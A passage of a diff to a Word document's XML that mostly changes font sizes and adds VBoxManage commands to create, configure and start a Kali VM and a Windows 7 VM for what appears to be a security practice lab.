         <w:t xml:space="preserve"># Add </w:t>
@@ -6271,8 +6303,8 @@
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>VBoxGuestAdditions</w:t>
@@ -6280,8 +6312,8 @@
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> to VM</w:t>
@@ -6289,17 +6321,688 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>VBoxManage</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>storageattach</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> $KALI_VM --</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>storagectl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 'SATA' --port 1 --device 0 --type </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>dvddrive</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --medium 'C:\Program Files\Oracle\VirtualBox\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>VBoxGuestAdditions.iso</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>'</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t># Define boot order</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>VBoxManage</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>modifyvm</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> $KALI_VM --boot1 disk --boot2 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>dvd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --boot3 none --boot4 none</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t># Start Kali VM</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>VBoxManage</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>startvm</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> $KALI_VM --type </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>gui</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Start-Sleep 10</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>#--------------------------------------------------------------------------------------------------------------------------------------------------------------</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t># 3. Create Windows VM for vulnerability) | +- 15min</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>#--------------------------------------------------------------------------------------------------------------------------------------------------------------</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t># Register VM</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>VBoxManage</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>createvm</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --name $WINDOWS_7_VM --</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ostype</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 'Windows7_64' --register</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t># Set VM settings</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>VBoxManage</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>modifyvm</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> $WINDOWS_7_VM --</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>cpus</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> $CPU --memory $RAM --</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>graphicscontroller</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>vboxsvga</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>vram</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> $VRAM --nic1 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>natnetwork</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --nat-network1 $</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>NATNetworkName</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --clipboard-mode bidirectional --drag-and-drop bidirectional</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t># Add a SATA storage controller</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
@@ -6308,8 +7011,8 @@
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
@@ -6317,8 +7020,118 @@
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>storagectl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> $WINDOWS_7_VM --name 'SATA' --add </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>sata</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --controller </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>IntelAHCI</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --bootable on</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t># Add virtual disk to storage controller</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>VBoxManage</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>storageattach</w:t>
@@ -6326,17 +7139,17 @@
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> $KALI_VM --</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> $WINDOWS_7_VM --</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>storagectl</w:t>
@@ -6344,44 +7157,62 @@
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 'SATA' --port 1 --device 0 --type </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>dvddrive</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> --medium 'C:\Program Files\Oracle\VirtualBox\</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>VBoxGuestAdditions.iso</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 'SATA' --port 0 --device 0 --type </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>hdd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --medium </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>'.\VDI\Windows</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 7 Ultimate SP1 (64bit).</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>vdi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>'</w:t>
@@ -6389,25 +7220,27 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t># Define boot order</w:t>
@@ -6415,17 +7248,18 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>VBoxManage</w:t>
@@ -6433,8 +7267,8 @@
